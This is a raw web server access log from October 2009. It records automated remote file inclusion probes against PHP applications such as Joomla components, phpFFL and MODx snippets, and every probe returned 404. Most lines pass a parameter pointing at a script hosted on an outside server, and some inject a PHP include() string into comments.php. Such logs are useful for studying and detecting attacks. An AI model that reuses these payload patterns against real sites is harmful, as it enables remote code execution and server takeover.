216.196.219.6 - - [16/Oct/2009:06:42:04 -0500] "GET /logs/access_log.1235692800/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:42:07 -0500] "GET /logs/access_log.1252281600/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:42:32 -0500] "GET /resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:42:32 -0500] "GET /logs/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:42:32 -0500] "GET /logs/access_log.1239667200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:42:32 -0500] "GET /logs/access_log.1238371200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:42:56 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:42:56 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:42:59 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:43:01 -0500] "GET /logs/access_log.1242691200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
72.55.146.200 - - [16/Oct/2009:06:43:03 -0500] "GET //components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rapidgdev.com/media/id.txt??? HTTP/1.1" 404 321 "-""libwww-perl/5.805"
72.55.146.200 - - [16/Oct/2009:06:43:04 -0500] "GET /logs//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://rapidgdev.com/media/id.txt??? HTTP/1.1" 404 326 "-""libwww-perl/5.805"
64.150.183.219 - - [16/Oct/2009:06:43:15 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:43:15 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:43:15 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:06:43:20 -0500] "GET /logs/access_log.1242691200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:43:37 -0500] "GET /logs/access_log.1239667200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:43:37 -0500] "GET /resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 301 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:43:37 -0500] "GET /logs/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 306 "-""Mozilla/5.0"
211.206.120.162 - - [16/Oct/2009:06:43:37 -0500] "GET /logs/access_log.1238371200/resource/admin.php?lang=http://ihent.ru//id1.txt?? HTTP/1.1" 404 328 "-""Mozilla/5.0"
211.203.180.144 - - [16/Oct/2009:06:44:06 -0500] "GET /logs/access_log.1253404800//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.203.180.144 - - [16/Oct/2009:06:44:06 -0500] "GET //setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
211.203.180.144 - - [16/Oct/2009:06:44:06 -0500] "GET /logs/access_log.1250899200//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
211.203.180.144 - - [16/Oct/2009:06:44:06 -0500] "GET /logs//setup.php?dir=http://www.seorakhoney.com/shop/mail/id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:44:38 -0500] "GET /logs/access_log.1237248000/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
216.196.219.6 - - [16/Oct/2009:06:44:41 -0500] "GET /logs/access_log.1235606400/modules/xfsection/modify.php?dir_module=http://www.masuccessguy.com//pdf/1.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:06:45:00 -0500] "GET //skin/jiyoo_red/login.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:06:45:00 -0500] "GET /logs//skin/jiyoo_red/login.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
211.239.157.203 - - [16/Oct/2009:06:45:05 -0500] "GET /logs/access_log.1252281600//skin/jiyoo_red/login.php?dir=http://feelstory.net/.../id1.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
209.97.212.185 - - [16/Oct/2009:06:45:51 -0500] "GET /logs/access_log.1242691200//components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.gotophair.co.kr/bbs/data/psybnc/help/idxx.txt?? HTTP/1.1" 404 348 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:06:52:38 -0500] "GET /logs/access_log.1237680000/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:06:52:38 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 343 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:06:52:38 -0500] "GET /logs/access_log.1242691200/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 370 "-""Mozilla/5.0"
91.192.20.164 - - [16/Oct/2009:06:52:38 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.chicagofc.co.kr/fitness/data/come/fx29id1.txt??? HTTP/1.1" 404 348 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:53:37 -0500] "GET /logs/access_log.1251763200///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
87.98.252.56 - - [16/Oct/2009:06:53:39 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.livebmx.ru//assets/_MD.TXT??? HTTP/1.1" 404 327 "-""Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
87.98.252.56 - - [16/Oct/2009:06:56:35 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.livebmx.ru//assets/_MD.TXT??? HTTP/1.1" 404 332 "-""Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)"
213.175.197.86 - - [16/Oct/2009:06:57:46 -0500] "GET /logs/access_log.1241049600%20//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.livebmx.ru//assets/v6-i.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.805"
213.175.197.86 - - [16/Oct/2009:06:57:46 -0500] "GET /logs//assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.livebmx.ru//assets/v6-i.txt??? HTTP/1.1" 404 332 "-""libwww-perl/5.805"
213.175.197.86 - - [16/Oct/2009:06:57:46 -0500] "GET //assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.livebmx.ru//assets/v6-i.txt??? HTTP/1.1" 404 327 "-""libwww-perl/5.805"
72.55.146.200 - - [16/Oct/2009:06:58:37 -0500] "GET /logs//skin/jiyoo_red/login.php?dir=http://rapidgdev.com/media/id.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
72.55.146.200 - - [16/Oct/2009:06:58:37 -0500] "GET //skin/jiyoo_red/login.php?dir=http://rapidgdev.com/media/id.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
65.55.106.159 - - [16/Oct/2009:06:59:31 -0500] "GET /?M=A HTTP/1.1" 200 3245 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
118.107.162.36 - - [16/Oct/2009:06:59:32 -0500] "GET ///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 306 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:59:32 -0500] "GET /logs/access_log.1251763200///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:59:33 -0500] "GET /logs///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
118.107.162.36 - - [16/Oct/2009:06:59:33 -0500] "GET /logs/access_log.1251676800///separc.com/separc.php?/separc=http://www.separc.com/foro//id1.txt? HTTP/1.1" 404 333 "-""Mozilla/5.0"
65.55.106.181 - - [16/Oct/2009:07:01:01 -0500] "GET /logs/access_log.1122940800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
222.236.47.182 - - [16/Oct/2009:07:02:06 -0500] "GET /facileforms.frame.php?ff_compath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 304 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:02:06 -0500] "GET /logs/facileforms.frame.php?ff_compath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 309 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:02:33 -0500] "GET /logs/access_log.1247011200/facileforms.frame.php?ff_compath=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:08:19 -0500] "GET /logs/access_log.1251849600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:08:20 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:08:20 -0500] "GET /logs/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:08:22 -0500] "GET /principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:08:31 -0500] "GET /logs/access_log.1252713600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:08:55 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:08:55 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:08:55 -0500] "GET /logs/access_log.1248134400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:17 -0500] "GET /principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:17 -0500] "GET /logs/access_log.1251849600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:17 -0500] "GET /logs/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:17 -0500] "GET /logs/access_log.1252627200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:20 -0500] "GET /principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:20 -0500] "GET /logs/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:20 -0500] "GET /logs/access_log.1252627200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:21 -0500] "GET /logs/access_log.1252713600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:09:34 -0500] "GET /logs/access_log.1252713600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:09:44 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:09:44 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:09:44 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
65.55.208.131 - - [16/Oct/2009:07:11:43 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.131 - - [16/Oct/2009:07:11:43 -0500] "GET /logs/access_log.1252022400 HTTP/1.1" 304 - "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.207.138 - - [16/Oct/2009:07:12:02 -0500] "GET /logs/access_log.1144108800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
210.127.253.142 - - [16/Oct/2009:07:12:24 -0500] "GET //skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 338 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:12:24 -0500] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 343 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:12:24 -0500] "GET /logs/access_log.1230768000//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:12:24 -0500] "GET //index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 293 "-""Mozilla/5.0"
210.127.253.142 - - [16/Oct/2009:07:12:25 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://oktober3.fileave.com/read.txt? HTTP/1.1" 404 365 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:12:25 -0500] "GET /logs//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 298 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:12:25 -0500] "GET /logs/access_log.1248134400//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:12:38 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:12:38 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:12:38 -0500] "GET /logs/access_log.1248480000//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:11 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:11 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:12 -0500] "GET /logs/access_log.1248480000//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:12 -0500] "GET /logs/access_log.1241136000//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:25 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:25 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:25 -0500] "GET /logs/access_log.1248480000//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:31 -0500] "GET //modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:31 -0500] "GET /logs//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 331 "-""Mozilla/5.0"
85.94.201.138 - - [16/Oct/2009:07:13:31 -0500] "GET /logs/access_log.1248480000//modules/4nAlbum/public/displayCategory.php?basepath=http://174.120.21.188/~eing/copyright.txt??? HTTP/1.1" 404 353 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:47 -0500] "GET /logs/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:47 -0500] "GET /principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:50 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:50 -0500] "GET /logs/access_log.1251849600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:52 -0500] "GET /logs/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:52 -0500] "GET /logs/access_log.1252627200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:52 -0500] "GET /logs/access_log.1252713600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:52 -0500] "GET /principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:53 -0500] "GET /logs/access_log.1251849600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:16:57 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:04 -0500] "GET /logs/access_log.1251849600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:04 -0500] "GET /logs/access_log.1252627200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:04 -0500] "GET /logs/access_log.1252713600/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:11 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:24 -0500] "GET /logs/access_log.1251763200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
93.174.0.17 - - [16/Oct/2009:07:17:33 -0500] "GET /logs/access_log.1252627200/principal.php?conteudo=http://174.120.21.188/~komi/copyright.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.51.115 - - [16/Oct/2009:07:19:02 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.44.250.68 - - [16/Oct/2009:07:19:34 -0500] "GET /logs/access_log.1243296000//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.44.250.68 - - [16/Oct/2009:07:19:34 -0500] "GET /logs/access_log.1251331200//index.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://cafe7.fileave.com/id1.txt??? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:19:43 -0500] "GET /logs/access_log.1234137600//components/calendar/com_calendar.php?absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:19:43 -0500] "GET /logs//components/calendar/com_calendar.php?absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 325 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:19:43 -0500] "GET //components/calendar/com_calendar.php?absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
222.236.47.182 - - [16/Oct/2009:07:19:43 -0500] "GET /logs/access_log.1236038400//components/calendar/com_calendar.php?absolute_path=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 347 "-""Mozilla/5.0"
65.55.207.137 - - [16/Oct/2009:07:20:00 -0500] "GET /logs/access_log.1159660800 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.150.183.219 - - [16/Oct/2009:07:20:34 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:34 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:34 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:34 -0500] "GET /logs/access_log.1251504000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
65.55.51.115 - - [16/Oct/2009:07:20:38 -0500] "GET /logs/access_log.1197417600 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs/access_log.1251504000//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 296 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 301 "-""Mozilla/5.0"
64.150.183.219 - - [16/Oct/2009:07:20:44 -0500] "GET /logs/access_log.1243209600//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.mysecl.com/board/editor/id11.txt??? HTTP/1.1" 404 323 "-""Mozilla/5.0"
